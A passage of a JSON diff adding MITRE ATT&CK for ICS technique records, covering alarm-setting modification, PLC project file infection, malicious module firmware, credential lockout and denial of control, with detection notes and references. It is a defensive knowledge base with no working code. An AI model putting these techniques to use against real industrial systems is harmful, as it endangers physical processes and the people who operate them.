2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "I/O Module Discovery", + "description": "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0824", + "external_id": "T0824" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-30T20:15:14.260Z", + "name": "Denial of Control", + "description": "Adversaries may 
cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nIn the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0813", + "external_id": "T0813" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Mark Loveless April 2017", + "description": "Mark Loveless 2017, April 11 THE DALLAS COUNTY SIREN HACK Retrieved. 2020/11/06 ", + "url": "https://duo.com/decipher/the-dallas-county-siren-hack" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 
2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:17:43.803Z", + "name": "Modify Alarm Settings", + "description": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. \n\nIf an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. 
If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. \n\nIn ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Device Configuration/Parameters" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content", + "Asset: Asset Inventory" + ], + "type": "attack-pattern", + "id": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0838", + "external_id": "T0838" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 
2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Commonly Used Port", + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. \n \n * TCP:80 (HTTP) \n * TCP:443 (HTTPS) \n * TCP/UDP:53 (DNS) \n * TCP:1024-4999 (OPC on XP/Win2k3) \n * TCP:49152-65535 (OPC on Vista and later) \n * TCP:23 (TELNET) \n * UDP:161 (SNMP) \n * TCP:502 (MODBUS) \n * TCP:102 (S7comm/ISO-TSAP) \n * TCP:20000 (DNP3) \n * TCP:44818 (Ethernet/IP)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0885", + "external_id": "T0885" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T18:58:24.092Z", + "name": "Project File Infection", + "description": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev) \n\nAdversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. 
(Citation: PLCdev)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0873", + "external_id": "T0873" + }, + { + "source_name": "Beckhoff", + "description": "Beckhoff TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21 ", + "url": "https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "PLCdev", + "description": "PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 
2019/11/21 ", + "url": "http://www.plcdev.com/book/export/html/373" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Network Connection Enumeration", + "description": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Script: Script Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0840", + "external_id": "T0840" + }, + { + "source_name": "MITRE", + 
"description": "MITRE System Network Connections Discovery Retrieved. 2018/05/31 ", + "url": "https://attack.mitre.org/wiki/Technique/T1049" + }, + { + "source_name": "Netstat", + "description": "Wikipedia. (n.d.). Netstat. Retrieved May 23, 2022.", + "url": "https://en.wikipedia.org/wiki/Netstat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Lateral Tool Transfer", + "description": "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)\n\nIn control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "File: File Creation", + "File: File Metadata", + "Network Share: Network Share Access", + "Network Traffic: Network Traffic Flow", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "created": "2020-05-21T17:43:26.506Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0867", + "external_id": "T0867" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Lateral Tool Transfer Retrieved. 2019/10/27 Lateral Tool Transfer Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1570/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Module Firmware", + "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. \n\nThis technique is similar to [System Firmware](https://attack.mitre.org/techniques/T0857), but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: Daniel Peck, Dale Peterson January 2009) \n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: Daniel Peck, Dale Peterson January 2009) \n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. \n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. 
\n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. \n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. \n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0839", + "external_id": "T0839" + }, + { + "source_name": "Daniel Peck, Dale Peterson January 2009", + "description": "Daniel Peck, Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field 
Devices Retrieved. 2017/12/19 ", + "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Internet Accessible Device", + "description": "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique.\n\nAdversaries may leverage built in functions for remote access which may not be protected or utilize minimal legacy protections that may be targeted. (Citation: NCCIC January 2014) These services may be discoverable through the use of online scanning tools. \n\nIn the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing. (Citation: NCCIC January 2014) (Citation: Danny Yadron December 2015) (Citation: Mark Thompson March 2016)\n\nIn Trend Micros manufacturing deception operations adversaries were detected leveraging direct internet access to an ICS environment through the exposure of operational protocols such as Siemens S7, Omron FINS, and EtherNet/IP, in addition to misconfigured VNC access. 
(Citation: Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0883", + "external_id": "T0883" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "NCCIC January 2014", + "description": "NCCIC 2014, January 1 Internet Accessible Control Systems At Risk Retrieved. 
2019/11/07 ", + "url": "https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf" + }, + { + "source_name": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler", + "description": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 Caught in the Act: Running a Realistic Factory Honeypot to Capture Real Threats Retrieved. 2021/04/12 ", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-caught-in-the-act-running-a-realistic-factory-honeypot-to-capture-real-threats.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-05T14:14:48.109Z", + "name": "Data from Local System", + "description": "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes.\n\nAdversaries may do this using [Command-Line Interface](https://attack.mitre.org/techniques/T0807) or [Scripting](https://attack.mitre.org/techniques/T0853) techniques to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T0802) on the local system. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Input/Output Server", + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Script: Script Execution", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "created": "2023-03-30T18:56:02.424Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0893", + "external_id": "T0893" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-07T13:40:53.842Z", + "name": "Change Credential", + "description": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.\n\nAn adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. 
Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device’s configuration may be destroyed or include malicious actions for the process environment, which cannot not be removed through normal device configuration actions. \n\nAdditionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps.\n\n\nA chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. (Citation: German BAS Lockout Dec 2021) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_contributors": [ + "Felix Eberstaller" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "created": "2023-03-30T14:04:17.023Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0892", + "external_id": "T0892" + }, + { + "source_name": "German BAS Lockout Dec 2021", + "description": "Kelly Jackson Higgins. (2021, December 20). Lights Out: Cyberattacks Shut Down Building Automation Systems. 
Retrieved March 30, 2023.", + "url": "https://www.darkreading.com/attacks-breaches/lights-out-cyberattacks-shut-down-building-automation-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Modify Program", + "description": "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. \n\nProgram modification encompasses the addition and modification of instructions and logic contained in Program Organization Units (POU) (Citation: IEC February 2013) and similar programming elements found on controllers. This can include, for example, adding new functions to a controller, modifying the logic in existing functions and making new calls from one function to another. 
\n\nSome programs may allow an adversary to interact directly with the native API of the controller to take advantage of obscure features or vulnerabilities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Asset: Software", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0889", + "external_id": "T0889" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "type": "relationship", + "id": "relationship--ca0c26d7-c4a9-4c4a-bbd4-f3df4b1f5f69", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:50:10.284Z", + "description": "Monitor for processes spawning from known command shell applications (e.g., PowerShell, Bash). 
Benign activity will need to be allow-listed. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b5e52859-8dab-4e7e-af70-bb38c6993c98", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.200Z", + "relationship_type": "mitigates", + "description": "Preventing screen capture on a device may require disabling various system calls supported by the operating systems (e.g., Microsoft WindowsGraphicsCaputer APIs), however, these may be needed for other critical applications.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": 